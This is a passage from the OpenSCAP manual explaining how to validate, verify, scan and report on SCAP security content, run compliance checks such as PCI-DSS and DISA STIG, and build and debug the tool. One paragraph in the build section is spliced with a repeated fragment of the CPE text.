security content\nagainst standard SCAP XML schemas. The validation results are printed to the\nstandard error stream (stderr). The general syntax of such a validation command\nis the following:\n\n $ scap module validate [module_options_and_arguments] file\n\nwhere file is the full path to the file being validated. As a ```module``` you\ncan use:\n\n * xccdf,\n * oval,\n * cpe or\n * cve.\n\nThe only exception is the data stream module (ds), which uses the sds-validate\noperation instead of validate. So for example, it would be like:\n\n $ oscap ds sds-validate scap-ds.xml\n\nNOTE: Note that all SCAP components within the given data stream are validated\nautomatically and none of the components is specified separately.\n\nYou can also enable extra Schematron-based validation if you validate OVAL\nspecification. This validation method is slower but it provides deeper analysis.\nRun the following command to validate an OVAL document using Schematron:\n\n $ oscap oval validate --schematron oval-file.xml\n\nThe results of validation are printed to standard error stream (stderr).\n\nNOTE: Please note that for the rest of ```oscap``` functionality, unless you specify\n--skip-valid, validation will automatically occur before files are used.\nTherefore, you do not need to explicitly validate a datastream before\nuse.\n\n\n=== SCAP Content Signing and Signature Verification\nThe ```oscap``` itself does not do signature verification. It skips over the\nrespective elements. This is due to the fact that there are way too many options\nwhen it comes to keystores and crypto choices. Instead we recommend users to use\n{xmlsec}[xmlsec1] to verify their SCAP content. Safely evaluating signed\ncontent (with signature verification) involves the following steps:\n\n1) Install xmlsec1 and at least one of its crypto engines\n-------------------------------------\n# yum install xmlsec1 xmlsec1-openssl\n-------------------------------------\n\n2) Run ```xmlsec1 --verify``` on the content:\n\nThis simple example will only show 2 specific cases of verifying the\nsignature, the steps may vary depending on which technique was used to\nsign the datastream.\n\nAssuming the datastream was signed with a private key and we have the\nrespective public key to verify it with:\n\n------------------------------------------------------\n$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml\n------------------------------------------------------\n\nAssuming the datastream was signed with a certificate and we have the\nrespective public part of the certificate to verify it with:\n\n---------------------------------------------------------------\n$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml\n---------------------------------------------------------------\n\nThere are countless other options, for more details see: ```xmlsec1\n--help-verify```\n\nSuccessful output should look similar to this:\n\n-----------------------------------------------------\n$ xmlsec1 verify --pubkey-pem key.pub datastream.xml\nOK\nSignedInfo References (ok\/all): 1\/1\nManifests References (ok\/all): 0\/0\n-----------------------------------------------------\n\nAnd the exit code must be 0 before proceeding.\n\n3) If the previous steps resulted in successful verification, proceed\nby evaluating the datastream:\n\n---------------------------------\n$ oscap xccdf eval datastream.xml\n---------------------------------\n\nNOTE: If you want to experiment with various crypto engines of xmlsec1, see\n ```xmlsec1-config --help```\n\n\n=== Generating Reports and Guides\nAnother useful features of ```oscap``` is the ability to generate SCAP content in a\nhuman-readable format. It allows you to transform an XML file\ninto HTML or plain-text format. This feature is used to generate security\nguides and checklists, which serve as a source of information, as well as\nguidance for secure system configuration. The results of system scans can also\nbe transformed to well-readable result reports. The general command syntax is\nthe following:\n\n $ oscap module generate sub-module [specific_module\/sub-module_options_and_arguments] file\n\nwhere module is either ```xccdf``` or ```oval```, ```sub-module``` is a type of\nthe generated document, and file represents an XCCDF or OVAL file. A sub-module\ncan be either ```report```, ```guide```, ```custom``` or ```fix```. Please see\n ```man oscap``` for more details.\n\n\n=== Content Transformation\nThe oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet\nLanguage Transformations) language, which allows transformation of a SCAP\ncontent XML file into another XML, HTML, plain text or {xsl}[XSL] document.\nThis feature is very useful when you need the SCAP document in a\nhuman-readable form. The following commands represent the most common\ncases:\n\n* Creating a guide (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide.html[example]):\n--------------------------------------------------------\n$ oscap xccdf generate guide scap-xccdf.xml > guide.html\n--------------------------------------------------------\n\n* Creating a guide with profile checklist (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide-checklist.html[example]):\n------------------------------------------------------------------------------------\n$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html\n------------------------------------------------------------------------------------\n\n* Generating the XCCDF scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf.html[example]):\n-------------------------------------------------------------------\n$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html\n-------------------------------------------------------------------\n\n* Generating the OVAL scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-oval.html[example]):\n----------------------------------------------------------------\n$ oscap oval generate report oval-results.xml > report-oval.html\n----------------------------------------------------------------\n\n* Generating the XCCDF report with additional information from failed\nOVAL tests (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf-oval.html[example]):\n----\n$ oscap xccdf generate report --oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html\n----\n\n\n=== CPE applicability\nXCCDF rules in the content may target only specific platforms and hold\nno meaning on other platforms. Such an XCCDF rule contains an\n*<xccdf:platform>* element in its body. This element references a CPE\nname or CPE2 platform (defined using **cpe2:platform-specification**)\nthat could be defined in a CPE dictionary file or a CPE language file\nor it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is\ndeemed applicable if at least one of the listed platforms is applicable.\nIf an XCCDF rule contains no *<xccdf:platform>* elements it is considered\nalways applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n ```--cpe``` option and ```oscap``` auto-detects format of the file. The following\ncommand is an example of the XCCDF content evaluation using CPE name\nfrom an external file:\n\n-----------------------------------------------------------------------------------------\n$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml\n-----------------------------------------------------------------------------------------\n\nWhere *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file\ncontaining the scan results, and *external-cpe-file.xml* is the CPE\ndictionary or a language file.\n\nIf you are evaluating a source data stream, ```oscap``` automatically\nregisters all CPEs contained within the data stream. No extra steps have\nto be taken. You can also register an additional external CPE file, as\nshown by the command below:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the\nXCCDF document, *xccdf-results.xml* is a file containing the scan\nresults, and *additional-external-cpe.xml* is the additional CPE\ndictionary or language file.\n\nThe ```oscap``` tool will use an OVAL file attached to the CPE dictionary to\ndetermine applicability of any CPE name in the dictionary.\n\nApart from the instructions above, no extra steps have to be taken for\ncontent using *cpe:fact-ref* or **cpe2:fact-ref**. See the following\nsections for details on resolving.\n\n==== xccdf:platform applicability resolution\n\nWhen a CPE name or language model platform is referenced via\n*<xccdf:platform>* elements, resolution happens in the following order:\n\n . Look into embedded CPE2 language model if name is found and applicable deem\n it applicable\n . If not found or not applicable, look into external CPE2 language models\n (order of registration)\n . If not found or not applicable, look into embedded CPE dictionary\n . If not found or not applicable, look into external CPE dictionaries (order of\n registration)\n\nIf the CPE name is not found in any of the sources, it is deemed not\napplicable. If it is found in any of the sources but not applicable, we\nlook for it elsewhere.\n\n==== cpe:fact-ref and cpe2:fact-ref resolution\n\nCPE name referenced from within fact-ref is resolved in the following\norder:\n\n. Look into embedded CPE dictionary, if name is found and applicable\ndeem it applicable\n. If not found or not applicable, look into external CPE dictionaries\n(order of registration)\n\n==== Built-in CPE Naming Dictionary\n\nApart from the external CPE Dictionaries, ```oscap``` comes with an inbuilt\nCPE Dictionary. The built-in CPE Dictionary contains only a few products\n(sub-set of http:\/\/nvd.nist.gov\/cpe.cfm[Official CPE Dictionary]) and it\nis used as a fall-back option when there is no other CPE source found.\n\nThe list of inbuilt CPE names can be found in the output of\n\n-----------------\n$ oscap --version\n-----------------\n\nYou can file a request to include any additional product in the built-in\ndictionary via https:\/\/www.redhat.com\/mailman\/listinfo\/open-scap-list[open-scap\nmailing list] or\nhttps:\/\/bugzilla.redhat.com\/enter_bug.cgi?product=Fedora[bugzilla].\n\n\n=== Notes on the Concept of Multiple OVAL Values\nThis section describes advanced concepts of OVAL Variables and their\nimplementation in ```oscap```. The SCAP specification allows for an OVAL\nvariable to have multiple values during a single assessment run. There\nare two variable modes which can be combined:\n\n* Multival -- A variable is assigned with multiple values at the same\ntime. As an example, consider a variable which refers to preferred\npermission of a given file, that may take multiple values like: '600',\n'400'. The evaluation tries to match each (or all) and then outputs a\nsingle OVAL Definition result.\n* Multiset -- A variable is assigned with a different value (or\nmultival) for different evaluations. This is known as a\n*variable_instance*. As an example consider an OVAL definition which\nchecks that a package given by a variable is not installed. For the first\nevaluation of the definition, the variable can be assigned with\n'telnet-server' value, for second time the variable can be assigned with\n'tftp-server' value. Therefore both evaluations may output different\nresults. Thus, the OVAL Results file may contain multiple results for\nthe same definition, these are distinguished by *variable_instance*\nattribute.\n\nThese two concepts are a source of confusion for both the content\nauthors and the result consumers. On one hand, the first concept is well\nsupported by the standard and the OVAL Variable file format. It allows\nmultiple *<value>* elements for each *<variable>* element. On the other\nhand, the second concept is not supported by an OVAL Variable schema\nwhich prevents fully automated evaluation of the multisets (unless you\nuse XCCDF to bridge that gap).\n\nTIP: ```oscap``` supports both variable modes as described below.\n\n==== Sources of Variable Values\nFirst we need to understand how a single value can be bound to a\nvariable in the OVAL checking engine. There are three ways to do this:\n\n1) OVAL Variables File -- The values of external variables can be\ndefined in an external file. Such a file is called an OVAL Variable File\nand can be recognized by using the following command: `oscap info\nfile.xml`. The OVAL Variables file can be passed to the evaluation by\n ```--variables``` argument such as:\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\n\n2) XCCDF Bindings -- The values of external variables can be given from\nan XCCDF file. In the XCCDF file within each *<xccdf:check>* element,\nthere might be *<xccdf:check-export>* elements. These elements allow\ntransition of *<xccdf:value>* elements to *<oval:variables>* elements. The\nfollowing command allows users to export variable bindings from XCCDF to\nan OVAL Variables file:\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n\n3) Values within an OVAL Definition File -- Variables' values defined\ndirectly in the OVAL definitions file *<constant_variable>* and\n*<local_variable>* elements.\n\n==== Evaluation of Multiple OVAL Values\nWith ```oscap```, there are two possible ways how two or more values can be\nspecified for a variable used by one OVAL definition. The approach you choose\ndepends on what mode you want to use, multival or multiset.\n\nThe ```oscap``` handles multiple OVAL values seemlessly; such that user doesn't\nneed to do anything differently than what she (or he) does for a normal scan.\nThe command below demonstrates evaluation of DataStream, which may include\nmultiset, multival, or both concepts combined, or none of them.\n----\n$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\n==== Multival\nMultival can pass multiple values to a single OVAL definition\nevaluation. This can be accomplished by all three ways as described in\nprevious section.\n\n1) OVAL Variables file -- This option is straight forward. The file\nformat (XSD schema) allows for multiple *<value>* elements within each\n*<variable>* element.\n\n--------------------------------------------------------------------------------\n <variable id=\"oval:com.example.www:var:1\" datatype=\"string\" comment=\"Unknown\">\n <value>600<\/value>\n <value>400<\/value>\n <\/variable>\n--------------------------------------------------------------------------------\n\n2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* referring to the\nvery same OVAL variable binding with multiple different XCCDF values.\n-----------------------------------------------------------------------------------------------------\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_com.example.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-export value-id=\"xccdf_com.example.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n-----------------------------------------------------------------------------------------------------\n\n3) Values within OVAL Definitions file -- This is similar to using a\nVariables file, there are multiple *<value>* elements allowed within\n*<constant_variable>* or *<local_variable>* elements.\n\n==== Multiset\nMultiset allows for the very same OVAL definition to be evaluated\nmultiple times using different values assigned to the variables for each\nevaluation. In OpenSCAP, this is only possible by option (2) XCCDF\nBindings. The following XCCDF snippet evaluates twice the very same OVAL\nDefinition, each time it binds a different value to the OVAL variable.\n\n-------------------------------------------------------------------------------------------------------\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_1\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_2\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n-------------------------------------------------------------------------------------------------------\n\nAfter the evaluation, the OVAL results file will contain multiple\nresult-definitions and multiple result-tests and multiple\ncollected-objects. The elements of the same id will be differentiated by\nthe value of the *variable_instance* attribute. Each of the\ndefinitions\/tests\/object might have a different result of evaluation.\nThe following snippet of OVAL results file illustrates output of a\nmultiset evaluation.\n\n----\n <tests>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"true\" variable_instance=\"1\">\n <tested_item item_id=\"1117551\" result=\"true\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">600<\/tested_variable>\n <\/test>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"false\" variable_instance=\"2\">\n <tested_item item_id=\"1117551\" result=\"false\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">400<\/tested_variable>\n <\/test>\n <\/tests>\n----\n\n\n\n\n== Practical Examples\nThis section demonstrates practical usage of certain security content provided\nfor Red Hat products.\n\nThese practical examples show usage of industry standard checklists that\nwere validated by NIST.\n\n=== Auditing System Settings with SCAP Security Guide\nThe SSG project contains guidance for settings of Red Hat Enterprise Linux 7.\n\n1) Install the SSG\n\n $ sudo yum install -y scap-security-guide\n\n2) To inspect the security content use the ```oscap info``` module:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\nThe output of this command contains available configuration profiles. To audit\nyour system settings choose the\n ```xccdf_org.ssgproject.content_profile_rht-ccp``` profile and run the\nevaluation command . For example, the The following command is used to assess\nthe given system against a draft SCAP profile for Red Hat Certified Cloud\nProviders:\n\n $ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp\n--results ssg-rhel7-xccdf-result.xml --report ssg-rhel7-report.html\n\/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\n\n=== Auditing Security Vulnerabilities of Red Hat Products\nThe Red Hat Security Response Team provides OVAL definitions for all\nvulnerabilities (identified by CVE name) that affect Red Hat Enterprise\nLinux 3, 4, 5, 6 and 7. This enable users to perform a vulnerability scan\nand diagnose whether system is vulnerable or not.\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget http:\/\/www.redhat.com\/security\/data\/metrics\/com.redhat.rhsa-all.xccdf.xml\n$ wget http:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml\n--------------------------------------------------------------------------------------------\n\nThis is a sample output. It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issues but update was not applied so a\nsystem is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,\nCVE-2013-2017)\n\n------------------------------------------------------------------------------------\nTitle RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)\nRule oval-com.redhat.rhsa-def-20130911\nIdent CVE-2013-1935\nIdent CVE-2013-1943\nIdent CVE-2013-2017\nResult fail\n------------------------------------------------------------------------------------\n\nNOTE: Note that these OVAL definitions are designed to only cover software and\nupdates released by Red Hat. You need to provide additional definitions in order\nto detect the patch status of third-party software.\n\n\nHuman readable report *report.html* is generated by side with \"machine\"\nreadable report **results.xml**. Both files hold information about\nvulnerability status of scanned system. They map RHSA to CVEs and report\nwhat security advisories are not applied. CVE identifiers are linked\nwith National Vulnerability Databases where additional information like:\nCVE description, CVSS score, CVSS vector, etc. are stored.\n\nTo find out more information about this project, see\nhttp:\/\/www.redhat.com\/security\/data\/metrics\/.\n\n\n=== How to Evaluate PCI-DSS on RHEL7\nThis section describes how to evaluate the Payment Card Industry Data Security\nStandard (PCI-DSS) on Red Hat Enterprise Linux 7.\n\n1) Install SSG which provides the PCI-DSS SCAP content\n\n $ sudo yum install -y scap-security-guide\n\n2) Verify that the PCI-DSS profile is present\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n3) Evaluate the PCI-DSS content\n\n $ oscap xccdf eval --results results.xml --profile xccdf_org.ssgproject.content_profile_pci-dss \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n4) Generate report readable in a web browser.\n\n $ oscap xccdf generate report --output report.html results.xml\n\n=== How to Evaluate DISA STIG\nThis section describes how to evaluate the Defense Information Systems Agency\n(DISA) Security Technical Implementation Guide (STIG) on Red Hat Eneterprise\nLinux 6.\n\n1) Download the DISA STIG content.\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n2) Unpack the content.\n---------------------------------------------------\n$ unzip U_RedHat_6_V1R8_STIG.zip\n---------------------------------------------------\n\n3) Fix the content using a sed substitution.\n---------------------------------------------------------------------------------------------------\n$ sed -i 's\/<Group\\ \\(.*\\)\/<Group\\ selected=\"false\"\\ \\1\/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n---------------------------------------------------------------------------------------------------\n\nNOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF\nspecification 1.2] the ```selected``` attribute for *Rule* or *Group* is *true* by default.\nIt means that if you create a new profile even with only one rule selected, all\nrules within the benchmark will be evaluated because they are set to true by default. The\nsubstitution will set all Groups as unselected by default which means all\ndescendants will also be unselected by default.\n\n4) Display a list of available profiles.\n\n $ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n\n5) Evaluate your favorite profile, for example *MAC-1_Public*, and write\nXCCDF results into the results.xml file.\n----\n$ oscap xccdf eval --profile MAC-1_Public --results results.xml --cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n6) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nIf you are interested in DISA STIG content for RHEL5 or RHEL7 please visit\n{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 6*\nor *Red Hat Enterprise Linux 7* as a target product.\n\n=== How to Evaluate United States Government Configuration Baseline (USGCB)\nNOTE: NIST offers no official USGCB for RHEL6 as of September 2014 but you can\nacquire the content from the {ssg_git}[SSG] project.\n\nThe USGCB content for represents Tier IV Checklist for Red Hat\nEnterprise Linux 5 (as defined by NIST Special Publication 800-70).\n\nWARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1\nor later.\n\nAfter ensuring that version of OpenSCAP on your system is\nsufficient, perform the following tasks:\n\n1) Download the USGCB content.\n------------------------------------------------------------------------------\n$ wget http:\/\/usgcb.nist.gov\/usgcb\/content\/scap\/USGCB-rhel5desktop-1.2.5.0.zip\n------------------------------------------------------------------------------\n\n2) Unpack the USGCB content.\n--------------------------------------\n$ unzip USGCB-rhel5desktop-1.2.5.0.zip\n--------------------------------------\n\n3) Run evaluation of the USGCB content.\n----\n$ oscap xccdf eval --profile united_states_government_configuration_baseline --cpe usgcb-rhel5desktop-cpe-dictionary.xml --oval-results --fetch-remote-resources --results results.xml usgcb-rhel5desktop-xccdf.xml\n----\n\n4) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nAdditional reports can be generated from detailed OVAL result files.\nScanner outputs OVAL results files in the current directory, for each\nOVAL file on input there is one output. In case of USGCB, there is\none OVAL file distributed along the XCCDF, another one which is\ndownloaded from Red Hat Repository. The latter contains CVE information\nfor each evaluated definition.\n\n----\n$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml\n$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml\n----\n\nIf you're interested in runing evaluation of the USGCB on a remote machine using\na GUI please see:\nhttps:\/\/open-scap.org\/resources\/documentation\/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench\/[Evaluate\nRemote Machine for USGCB Compliance with SCAP Workbench] tutorial.\n\n\n=== How to Evaluate Third-Party Guidances\nThe SCAP content repository hosted at {nvd}[National Vulnerability Database]\n(NVD) can be searched for publicly available guidances for a given\nproduct. For example, as per 2013\/05\/11 there are\nhttp:\/\/web.nvd.nist.gov\/view\/ncp\/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]\nTier III checklists for Red Hat Enterprise Linux 5. Analogously, the\nMITRE Corp. hosts http:\/\/oval.mitre.org\/rep-data\/[repository] of OVAL\ncontent for various platforms, sorted by versions and classes.\n\nLikewise the USGCB, any downloaded guidance can be evaluated by\nOpenSCAP.\n\n* Examplary evaluation of DoD Consensus Security Configuration Checklist\nfor Red Hat Enterprise Linux 5 (2.0)\n----\n$ wget http:\/\/nvd.nist.gov\/ncp\/DoD-RHEL5-desktop.zip\n$ unzip DoD-RHEL5-desktop.zip\n$ oscap xccdf eval --profile DOD_baseline_1.0.0.1 --cpe dcb-rhel5_cpe-dictionary.xml --results result.xml --oval-results dcb-rhel5_xccdf.xml\n----\n\n* Examplary evaluation of Red Hat 5 STIG Benchmark (Version 1, Release 12)\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ oscap xccdf eval --profile MAC-2_Public --cpe\nU_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml --results result.xml\n--oval-results U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nFurthermore, any individual file from the archive can be inspected using\nthe `oscap info` command line option. The oscap program does not have\nthe concept of importing SCAP files, therefore it can process any SCAP\nfiles available on the filesystem. That is possible because the SCAP\nstandard files are native file formats of the OpenSCAP.\n\n\n\n=== How to evaluate guidances for Red Hat Enterprise Linux 6\nGuidances for Red Hat Enterprise Linux 6 can be acquired from\n{ssg_git}[SCAP Security Guide\nproject] (SSG). SSG holds currently the most evolved and elaborate SCAP\npolicy for Linux systems. The project provides practical security\nhardening advice for Red Hat products and also links it to compliance\nrequirements in order to ease deployment activities, such as\ncertification and accreditation.\n\nThe project started in 2011 as open collaboration of U.S. Government\nbodies to develop next generation of United States Government Baseline\n(USGCB) available for Red Hat Enterprise Linux 6. There are multiple\nparties contributing to the project from the public sector and private\nsector.\n\nThe SSG project contains baselines for both desktops and servers. See\nhttps:\/\/github.com\/OpenSCAP\/scap-security-guide\n\n\n\n[[devs]]\n== Developer's operations\nThis part of documentation is meant to serve mainly to developers who want to\ncontribute to the ```oscap```, help to fix bugs, or take an advantage of\nthe OpenSCAP library and create own projects on top of it.\n\n[[devs-compiling]]\n=== Compiling\nIf you want to build the ```libopenscap``` library and the ```oscap``` tool from\nthe {oscap_git}[source code] then follow these instructions:\n\n1) Get the lastest source code\n\n $ git clone https:\/\/github.com\/OpenSCAP\/openscap.git\n\n2) Run the follwoing script.\n\n $ .\/autogen.sh\n\nNOTE: The *autoconf*, *automake*, and *libtool* tools are required to be\ninstalled on your system. If you use a release taball, you can skip this step.\n\n3) Run the following commands to build the library.\n\n $ .\/configure\n $ make\n\nBuild dependencies may vary in dependency on enabled f element in its body. This\nelement references a CPE name or CPE2 platform (defined using\ncpe2:platform-specification) that could be defined in a CPE dictionary file or a\nCPE language file; or it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is deemed\napplicable if at least one of the listed platforms is applicable. If an XCCDF\nrule contains no *<xccdf:platform>* elements it is considered always applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n ```--cpe```\noption; oscap auto-detects format of the file. The following command is an\nexample of the XCCDF content evaluation using CPE name from an external file:\n\neatures (by the configure command). By default, you need the following packages\ninstalled on your system:\n\n\n* swig\n* libxml2-devel\n* rpm-devel\n* libgcrypt-devel\n* pcre-devel\n* python-devel\n* perl-devel\n* libcurl-devel\n* libxslt-devel\n* libtool\n* perl-XML-XPath\n\n. Run library self-checks by executing the following command: # make check\n\n. Run the installation procedure by executing the following command: # make install\n\nIf you want to create a package for Fedora or Red Hat Enterprise Linux\ndistribution, you will need the respective spec files. These spec files are\navailable under the following directories:\n\n* dist\/fedora\n* dist\/rhel5\n* dist\/rhel6\n\n=== Debugging\nDevelopers and users who intend to help find and fix possible bugs in OpenSCAP\nshould follow these instructions on how to enable debugging in OpenSCAP:\n\n==== Debug mode\nThe first and an obvious step is to re-compile library so debug mode is\nenabled.\n\n------------------------------------\n$ .\/configure --enable-debug && make\n------------------------------------\n\nDebug mode provides:\n\n* debug symbols on and optimization off - you can use ```gdb```,\n* logs - ```oscap``` tool will generate *oscap_debug.log.\\{pid}* log files for\nevery process that was run.\n* http:\/\/www.gnu.org\/software\/gawk\/manual\/html_node\/Assert-Function.html[assertions]\nare evaluated.\n\n==== Testing library\nNext important step is to ```preload libopenscap_testing.so``` before you run\n ```oscap``` tool. The testing library allows you to specify custom path to\nprobes via *OVAL_PROBE_DIR* environment variable. The easiest way how to\nachieve that without need to install libopenscap, is to use shell\nscript called *run* in the OpenSCAP directory.\n\n-------------------------------------------------\n$ .\/run utils\/.libs\/oscap xccdf eval ... whatever\n-------------------------------------------------\n\nThe *run* script is generated at configure time and it sets:\n\n* **LD_PRELOAD* and *LD_LIBRARY_PATH* - preload ```libopenscap_testing.so```\n* *OVAL_PROBE_DIR* - path to probes\n* *OSCAP_SCHEMA_PATH* - path to XCCDF, OVAL, CPE, ... schemas. (required\nfor valudation)\n* *OSCAP_XSLT_PATH*- path to XSLT transformations. (required if you want\nto generate html documents from xml)\n\n==== Example\n\n $ .\/run gdb --args utils\/.libs\/oscap xccdf eval --profile hard --results xccdf-results.xml --oval-results my-favourite-xccdf-checklist.xml\n\n\nThe ```--oval-results``` option force ```oscap``` tool to generate OVAL Result file\nfor each OVAL session used for evaluation. It's also very useful for\ndebugging!\n\n==== Debugging probes\nIt's also possible to debug a probe itself. You need to raise timeout\nvalue for thread join in ```src\/OVAL\/probes\/probe\/main.c:228``` and rebuild\nsources.\n\n----------------------------\n- j_tm.tv_sec += 3;\n+ j_tm.tv_sec += 3000;\n----------------------------\n\nThen you can run gdb with probe binary:\n--------------------------------------------------------\n$ .\/run gdb src\/OVAL\/probes\/.libs\/probe_rpmverifypackage\n--------------------------------------------------------\n\nAn input for the probe can be found in ```oscap_debug.log``` created by\nprevious ```oscap``` tool run, e.g.:\n\n----\n (\"seap.msg\" \":id\" 0 ((\"rpmverifypackage_object\" \":id\" \"oval:org.mitre.oval.test:obj:1386\" \":oval_version\" 84541440 ) ((\"name\" \":operation\" 5 \":var_check\" 1 ) \"plymouth\" ) ((\"behaviors\" \":nodeps\" \"false\" \":nodigest\" \"false\" \":noscripts\" \"true\" \":nosignature\" \"false\" ) ) ) )\n----\n\n==== Environment variables\nThere are few more environment variables that control ```oscap``` tool\nbehaviour.\n\n* *OSCAP_FULL_VALIDATION=1* - validate all exported documents (slower)\n* *SEXP_VALIDATE_DISABLE=1* - do not validate SEXP expressions (faster)\n* *OSCAP_DEBUG_FILE=\"foo\"* - name for debug files\n* *OSCAP_DEBUG_LEVEL=2* - set verbosity in debug logs\n** ```1``` for Errors\n** ```2``` for Errors & Warnings\n** ```3``` for Errors & Warnings & Info messages\n\n\n\n=== Scanning with Script Check Engine (SCE)\nThe Script Check Engine (SCE) is an alternative check engine for XCCDF checklist\nevaluation. SCE allows you to call shell scripts out of the XCCDF document.\nThis approach might be suitable for various use cases, mostly when OVAL checks\nare not required. More information about SCE usage is available on this page:\n{sce_web}[Using SCE].\n\nWARNING: SCE is not part of any SCAP specification.\n\n\n=== Building OpenSCAP on Windows\nThe OpenSCAP library is developed mainly on Linux platform but it can be built\nalso on Windows platforms. Follow these instructions to build\nOpenSCAP on Windows using Cygwin:\n\n1. The easiest way to compile OpenSCAP on Windows is in\nhttp:\/\/www.cygwin.com\/[cygwin]. First install basic set of packages from\n*cygwin* distribution plus:\n* *autoconf automake libtool make gcc*\n* *pcre-devel libxml2-devel libcurl-devel libgrcypt-devel*\n* *swig perl python*\n2. Checkout the portable branch of OpenSCAP:\n\n $ git clone -b portable git:\/\/git.fedorahosted.org\/git\/openscap.git\n\n3. Run autotools machinery by\n\n $ .\/autogen.sh\n\n4. Unfortunately the probes support is platform dependent and windows code\nwas not implemented yet so it's necessary to disable compilation of probes by\n\n $ configure --disable-probes\n\n5. Build the library\n\n $ make build\n\n6. You might want to run the library self-check by\n\n $ make check\n\n7. Install the library\n\n $ make install\n\n8. The final DLL is called ```cygopenscap-0.dll``` and you can link you app\nto 